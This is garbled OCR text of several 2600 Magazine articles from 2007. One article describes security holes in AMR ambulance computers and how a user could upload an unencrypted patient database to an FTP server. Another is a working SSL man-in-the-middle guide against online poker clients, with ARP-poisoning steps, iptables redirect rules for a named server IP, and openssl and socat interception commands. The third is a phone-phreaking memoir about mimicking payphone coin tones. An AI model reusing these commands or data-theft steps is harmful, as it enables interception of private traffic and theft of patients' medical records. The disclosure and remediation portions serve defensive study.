section where w e discuss t h e CRMA P C cards text entered by a user. So to find a patient' s
a n d how they access the I nternet. The region personal i nformation you need only run a
I am most fam i l iar with used Cingular as a query of the appropriate tables and match the
wi reless provider and Sony GC83 EDGE PC patient's name, date of birth, address, phone
cards. I ' m not sure why, but they refuse to use n u mber, and Social Secu rity N umber based
the most recent firmware versions. Rumor on the PCR 1 0. It should be noted that fai l u re
has it someone somewhere had a problem to protect this i nformation from unauthorized
with a firmware version and had to down- users (which includes an EMT or paramedic
grade to fix the problem. Of course, two or authorized to use the system but not autho
three new versions have come out si nce then rized to view data entered by another user) is
and AMR has yet to upgrade to the newer a violation of federal l aw - reference H I PAA
versions. What I find particu larly i nteresti ng §1 64.308 (a)(4), which states that users must
is that the Ci ngular network issues Class C be prevented from accessi ng sensitive elec
addresses. Couple th is with the use of Real tronic data they do not need to access i n
V N C o n every AMR computer a n d you have a order to perform their duties. Basica l l y, you
gapi ng security hole. If someone were to snag should not be able to view patient data you
the company password (I believe they have did not personally enter, but you can. But to
only two passwords - one for workstations rea l l y get at the data it's best to just steal the
and one for servers) they could sniff around whole database, someth i ng else you shou ld
the Cingular network, assuming they have definitely not be able to do. A standard user
a Ci ngu lar card and are in the same region, can run tel net, open a connection to an
and find a computer with port 5 900 open. FTP server, and upload "C: Program Fi les
The advantage to the IP addressi ng scheme MEDSMEDS.mdb" (sometimes the fi le name
bei ng Class C, for those who haven 't figured includes a version number). Older versions of
it out, is that you significantly dimi nish the MEDS created a fi le in the root d irectory title
number of IP addresses you have to scan to "PCRDATA" with no file extension. Th is fi le
find an AMR computer. But there is another had a l l of the PCR data on the system in plain
way you can isolate an AMR computer on text, another grievous H I PPA violation. Today
th is network. the fi le is encrypted, a step that took only fou r
A s previously mentioned, A M R uses an or five years to i mplement.
Access Database front-end developed in- As you can see by doi ng thi ngs i n-house
house to chart patient data. They have dubbed and under budgeti ng thei r projects AMR has
the program MEDS. It stands for Multi-EMS left themselves open to some pretty costly
Data System. The database is u nencrypted so lawsu its. With the private ambulance i ndustry
any user can poke around in a l l of the tables, becoming more and more competitive, they
provided they can figure out how to launch have rea l ly taken some big chances with this
Page 22 --------------------- 2600 Magazine

program . Consider the fact that some states
have mandated public reporting of security
breaches in publicly traded companies, mix
it with the genera l l y very competitive public
bidding process that EMS agencies are typi
cal ly requ ired to go through every few years
for thei r ambulance provider contracts, and
throw in a l ittle industrial espionage... see
where I ' m goi ng? AMR has opened itself to
simple espionage tactics by making it i ncred
ibly easy for a corporate spy to get h i red on
as a field employee, steal protected personal
data stored on a field system, and let it be
known that the data was stolen. AMR would
then be requ i red to contact every person
whose personal i nformation was compro
mised and i nform them of such and make a
public announcement reporti ng the breach.
Someth ing of that nature happening during
a contract bid wou ld be devastating to the
company, which is a l ready losing bids across
the nation.
That's pretty much all of the goodies I
picked up regardi ng the computers, but here
are some fun vehicle facts for those of you
u nfortunate enough to be working for the
giant:
1 . If you ' re tired of hearing the seat belt
rem inder d i ng at you a l l the time you can
disable the Ford " BeltMinder" feature quite
easily. Simply turn the ambulance off, keep
a l l of the doors c losed, set the parking brake,
turn off the headl ights and do the fol lowi ng:
Insert the key and turn it forward to the first
position, but do not start the car. After about
a minute the l ittle guy wearing h i s seat belt
l ight wi l l appear on the cluster panel (dash
board). You now have 30 seconds to buckle
and then u nbuckle you r seat belt ten times.
After the tenth time the l ight wi l l flash fou r
ti mes indicati ng the function h a s been
disabled. Now buckle and unbuckle one
more time. Congrats, it wi l l now leave you
alone. Each year is different so play around
with it. I fou nd th is i nformation on Google,
so you shou ld be able to as wel l . Sorry for
those who have RoadSafety. This won 't work
for you.
2 . If you don 't l i ke being d inged at for
having the door open, or having the l ight
on, it's pretty easy to disable this featu re too.
First, you shou ld know that when the door
is open the circuit is closed by the door pin.
So disconnecti ng the door pin wi l l make the
vehicle computer thi n k the door is always
closed. To do th is, just pu l l rea l l y hard (I was
able to do it with bare fingers) on the door pin
itself. When it comes out simply disconnect
the wires and then rei nsert the pin i nto the
door jam. Done.
3. Final ly, to shut up that l ady who blabs at
you whi le you ' re backing up just take a look
at the l ittle speaker beh ind the driver' s head.
On one side is a tiny l ittle switch. F l i p it and
she' l l be no more.
None of these l ittle workarounds damages
or vanda l izes the vehicle in anyway, so have
at it. And for God's sake, find a company with
a sou l to work for. Peace!
HOPE NUMBER SIX
I f you m i ssed out o n o u r latest confe rence (or if you
were there a nd somehow ma naged to m i ss one of the
more tha n 70 ta l ks g iven), may we suggest gett i n g
a h o l d o f o u r H O P E N u m ber Six DVD s ?
There's no way we ca n l i st them a l l here but if you go to
http ://store. 2600.com/hopen u m be rsix.html you'l i get a
se n se of what we're ta l ki ng a bout.
We sti l l have leftover s h i rts too. For ?20 you get a
H O P E s h i rt, a conference badge, a conference prog ra m,
and a H O P E sticker. Oversea s add ?5 fo r s h i p p i n g .
2600
PO Box 752
M i d d l e I s l a n d , NY 1 1 9 53 U SA
Spring 2007---------------------

On l i ne Poker So
by John Smith Rootkits are
A lthough we most often associate SSL based rootkits for U N IX and Windows which
(Secure Sockets Layer) or TLS (Transport can be made to redi rect network traffic to an
Layer Security) with "secure" versions of our attacker. Insecu re routers are another option;
favorite I nternet services (HTTPS, IMAPS, that Linux router the neighborhood geek
SMTPS), it can be used to secure arbitrary set up for pizza and coke looks l i ke d j u i cy
applications. I n fact, it is used quite often target.. . .
i n t h e onl i ne gambl i ng world t o secu re the M y traffic redi rection sol ution i nvolved a
connection from the game cl ient to the game Perl script tor Nemesis, which i njects unso
server. U nfortunately it is often used in an l i cited ARP requests, and i ptables packet
i ncorrect manner, which leaves it open to mangl ing to rewrite the destination server I P
man-i n-the-middle attacks, where an attacker address/port with a local one. A l l you need
can read/modify/insert thei r own data i nto the to do is figure out which IP the poker client
connection. tal ks to and rewrite it to you r waiting M ITM
SSL provides methods for endpoint verifi- process. For example, City Poker uses I P
cation and traffic privacy for network commu- 2 00. 1 24. 1 3 7. 1 09 port 443. If I ' m run n i ng my
n i cations. Endpoint verification is done by socat process on port 1 0007, the firewal l rule
val idating a "peer certificate" from the remote becomes:
host by checking the signature with a trusted echo 1 > /proc /sys / net/ ipv4 / ip_forward
thi rd-party (such as Verisign). Traffic I)rivacy I sbin/ iptables --policy FORWARD ACCEPT
, iptables -t nat -A PREROUTING -p tcp
uses symmetric ciphers to encrypt/decrypt --d 2 0 0 . 1 2 4 . 1 3 7 . 1 0 9 --dport 4 4 3 _
data between the two hosts. -j REDIRECT --to-ports 1 0 0 0 7
Traffic privacy is obvious - you don 't want The first two l ines al low us to forward
someone with a sniffer to see you r passwords traffic and the th ird l i ne is our firewal l rule.
or credit card number when you ' re orderi ng Man-in-the-Middle Process
you r 2600 subscription. E ndpoint verifica- Although we can rol l our own man-in-
tion is extremely i mportant also, but many the-middle process, I chose to use socat
developers (obviously) don 't th i n k of it. I n for simpl icity. I f you ' re goi ng to write you r
fact, t h e endpoint verification is exactly what own, you simply need to have it l i sten for
prevents man-i n-the-middle attacks - if the SSL con nections on one side and establish
peer (remote server) that is being connected them on the other. You wi l l need to generate
to can 't be verified, then the cl ient shou ld a fake server certificate that will be given to
quit. U nfortunately, this option is turned off the cl ient - self-signed/expired doesn't matter
oy default! Any cl ient software that has th is since the cl ient isn't checking! Here are the
flaw can then be attacked. commands to generate a self-signed certifi-
The man-in-the-middle attack consists cate, and to set up socat to perform the MITM
of three steps: redi recting network traffic, logging data in cleartext to stdout:
answering requests from the cl ient on behalf openssl reg -x5 0 9 -nodes -newkey
of the server, and answeri ng requests from the
-rs a : 1 0 2 4 -days 365 -keyout
-fakecert . pem -out f akecert . pem
server on behalf of the cl ient. I chose to use socat -v -x open s s l - l isten : 1 0 0 0 7 , cert
ARP-cache poisoning and iptables mangl i ng -ificate= . I fakecert . pern, verify=O , fork
for the redi rection, and socat to actual lv - opens s l : 2 0 0 . 1 2 4 . 1 3 7 . 1 0 9 : 4 4 3 , verify=O
execute the man-in-the-middle attack.
'
I
-2>& 1 I tee . I ci tyPokerCapture . txt
managed to break Virgin Poker, and City
When generating the certificate, I just
Poker's cl ient, viewing a l l c l ient-server traffic
chose al l the defaults. The "-nodes" argument
in clear text.
means you don 't want to enter a passphrase
Traffic Redirection
(password) for the key. The soeat l i ne sets u p
Getting network traffic from the vict i m isn't
an openssl-listen socket on port 1 0007 with
too hard. If you ' re on the same LAN you can
the fake certificate we generated above. 11
use ARP cache poisoning or DNS hijacking. w i l l log packets to stdout ("-v -x" arguments)
Page 24 --------------------- 2600 Magazine

and establ ish an openssl connection to the
real game server without verifying the peer
certificate (verify=O).
You shou ld now be able to fire up the
poker cl ient and see a n ice c1eartext version
of everything run n i ng between the cl ient and
server.
Conclusions
wrote a tool to check for expired/self
signed certificates and scanned 645 SSL ports
on a /1 9 network wel l known for hosting
gambling-related sites. It found 3 04 ports that
were misconfigured and are therefore open
to this type of attack. Some companies do this
Implications the right way - Party Poker, for example, veri-
My origi nal motivation was to take a fies the peer certificate and checks the subject
look at poker protocols, to see how "chatty" name in the cl ient.
they are and what i nformation is transferred. This flaw is actually quite easy to fix. On
For example, what if the protocol designer the cl ient side, developers should always val i
thought it wou ld b e OK i f a l l o f a player's date the peer certificate (at least in produc
"hole cards" (two cards dealt before the first tion !) and servers should have SSL certificates
round of betting) were sent to each cl ient signed by real CAs. Protocol developers
before the hand began. We can reverse engi- shou ld always assume that the protocol can
neer the protocol and see what the command be viewed and treat input from the c lient
structure is l i ke. Is there a debug mode or as tainted. Data should be checked with a
special admi n commands that we can send? default reject pol i cy - even though the cl ient
The server process now loses any c l ient-side and server were written by the same team,
fi lters for thi ngs l i ke data lengths and types. that doesn't mean you shouldn't sanitize data
Can you say "fuzzer?" before using it.
Snippet of data from City Poker dealing the turn card:
< 2 0 0 6 / 0 9 / 0 7 1 3 : 5 1 : 2 1 . 1 6 2 3 3 1 1ength= 1 1 4 f rom= 1 8 9 6 4 to= 1 8 9 6 3
0 0 0 0 0 0 2 2 0 0 0 1 3 3 0 8 3 2 3 5 3 6 3 5 3 2 3 1 3 4 3 0 • • • " • • 3 . 2 5 6 5 2 1 4 0
0 0 0 0 4 d 0 0 4 4 6 5 6 1 6c 6 9 6 e 6 7 2 0 7 4 7 5 7 2 6e • • M . Dealing turn
2 e 00 4 c 0 0 39 00 00 00 00 48 00 0 2 31 3 7 08 32 • • L . 9 • • • • H • • 1 7 . 2
3 5 3 6 3 5 3 2 3 1 3 4 3 0 0 0 0 0 S f 4 4 0 0 4 2 6 f 6 1 7 2 5 6 5 2 1 4 0 • • _D . Boar
64 20 63 61 72 64 73 20 5b 51 68 20 54 63 20 35 d cards I Oh Tc 5
64 2 0 4b 63 5d 00 43 32 00 3 1 36 00 43 30 00 33 d KC j . C 2 . 1 6 . C O . 3
3 6 0 0 4 3 3 3 0 0 3 1 3 1 0 0 4 3 3 1 0 0 3 8 0 0 S f 4 c 0 0 6 . C 3 . 1 1 . C 1 . 8 . _L .
H 0 0 9 .
Snippet of data from Virgin Poker client doing a ping and reply:
< 2 0 0 6 / 0 8 / 0 9 0 8 : 3 6 : 3 2 . 4 1 4 7 2 3 length= 1 7 f rom= 4 9 2 to=4 9 1
5 0 4 3 4 b 5 4 0 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 5 0 6 9 6 e 6 7 PCKT • • • . • • • • Ping
0 0
> 2 0 0 6 / 0 8 / 0 9 0 8 : 3 6 : 3 2 . 4 3 9 2 8 7 length= 1 7 f rom= 8 6 4 to= 8 6 3
5 0 4 3 4 b 5 4 0 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 5 0 6 9 6 e 6 7 PCKT • • • • • • • • Ping
00

Oorlof mijn arme schapen
Die zijt in groten nood
Uw herder zal niet slapen
AI zijt gij nu verstrooid!
The above is from "Het Wi lhelmus"
(the Dutch national anthem), verse 1 4.
It's a concept and it doesn't translate wel l
to Engl ish. "Hacker" i s a concept about
concepts. Unfortunately it doesn't translate
wel l to any language. My l ife is about turn i ng
concepts i nto usefu l products. A hacker does
that and much more. Let's get to it.
In the 60s, AT&T ran an ad campaign:
"The telephone is not a toy." Thank you AT&T!
Vietnam, LBJ, the Cold War, and so on. . .
everythi ng was a l ie. S o the telephone m ust
be the best toy ever i nvented ! Is a greater
u nderstatement possible?
I always wanted the other end to hang up
first so I cou ld hear what it sounded l i ke. That
little "pliek" tra i l i ng off i n the background
was fasci nating. I real ized it must play the
major role in making and maintain i ng the
"long distance" cal l . Soon I cou ld whistle it
and see what it cou ld do - before the Quaker
Oats wh istle and 800 numbers.
My early experi mentation was only to
places my parents cal led. They only looked at
the "place" on the bi l l Jnd if I had an "acci
dent," that was si mply it for the day.
There was more, so m uch more. Some
ti mes after placi ng a "to l l cal l " (a type of
local cal l) I ' d hear the number I pulse-dialed
pulse-dialed a second time. There were beeps
associated with this. Other ti mes I wou ld
hear beeps that sounded l ike steel drums. I
loved the "drums" and qu ickly realized this
wasn't music but communications! (They
were MF tones, to be precise.) I was on to
somethi ng. The "ultra-modern" phone system
was using the same techn ique the primitive
" Bush people" had used for generations. It
was obvious tones were tel l i ng the other end
what to do whether I heard it or not. How did
they do it? "Ask and you sha l l receive." When
everyth i ng seemed to be a l ie, that bibl ical
verse was to be the truth. The l ittle brat was
becom ing an operator and learn i ng how to
social engi neer. Soon, the secret was m i ne.
Best of all, I was to d iscover I wasn't alone.
There was th is kid i n sixth grade named Dan
N . He was the shortest kid i n the class but
very strong and nobody messed with h i m .
D a n was l ater to tel l me of someone who
cou ld make "free cal l s" with sound l i ke I
could. That man was Cap ' n Crunch .
It was 7 969. We were a few 1 2 -year-old
boys and there were a few twice our age. We
knew we had somethi ng goi ng i nto jun ior
high, but we had no idea what our impact on
society was to be.
With an age range between 1 1 and 1 4
years, jun ior h igh was the u ltimate freak
show. For some of us it was a "phreak" show
and we didn't show a thing outside our tight
group. Th is was a very uneventfu l time in my
l ife.
I n 1 970 a very sma l l piece in Popular
Science reported on a new payphone with
a picture of th is most ugly beast. The most
important features were a single coi n slot and
"si lent electronic signals to replace the fam i l iar
sounds that currently signal the operator of
deposited coi ns." I nteresti ngly, these horrors
were to show up first where I l ived. I was
goi ng to find out what those "silent signals"
were. Fi rst, I had a friend cal l me at one of
these "fortress phones" whi le he recorded the
cal l . I "sacrificed" 40 cents (my l u nch money)
to do th is. I instructed my friend to cal l back
on the off chance I got the money back
and we could record the tones again. Sure
enough it returned! We were able to repeat
th is several times. Don 't forget: Hacking is
scientific. It was a simple matter to whip up
a simple phase-shift osc i l l ator and ampl ifier
to match the frequency (qu ickly determ i ned
to be 2200Hz but that isn't i mportant). We
needed a way to gate the tone.
A sma l l strip of copper was taped with ordi
nary cel lo tape i n such a way as to leave five
stripes of copper about 8mm wide exposed.
Th is formed, with a conducti ng probe, a
custom switch. With just a couple of m i nutes
Page 26 --------------------- 2600 Magazine

2600 v24 n1 (spring 2007)

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to 2600 v24 n1 (spring 2007)

Similar to 2600 v24 n1 (spring 2007) (20)

More from Felipe Prado

More from Felipe Prado (20)

Recently uploaded

Recently uploaded (20)

2600 v24 n1 (spring 2007)